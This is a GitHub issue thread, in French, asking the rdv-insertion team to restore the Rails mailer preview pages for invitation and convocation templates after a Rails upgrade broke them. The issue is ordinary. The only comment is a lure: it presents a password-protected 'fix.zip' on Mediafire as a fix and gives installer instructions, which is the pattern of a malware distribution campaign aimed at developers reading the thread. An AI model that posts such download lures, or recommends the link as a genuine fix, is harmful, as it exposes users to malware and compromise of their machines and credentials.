### ISSUE TITLE
[Invitations] - Rendre visible l'index de nos templates d'invitations disponibles

### ISSUE THREAD

**Issue by Evajuliab** [gip-inclusion/rdv-insertion#2268]
Permettre la visualisation de tous nos templates d'invitations disponibles pour faciliter le choix adéquat de nos utilisateurs.
Elle était visible sur cette page avant : https://www.rdv-insertion-demo.fr/rails/mailers/invitation (lien cassé 404)

Remettre également page pour les convos : https://www.rdv-insertion-demo.fr/rails/mailers/convocation

Bug d'affichage dû à un problème de déprécation suite à une montée en version de Rails cc @aminedhobb

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
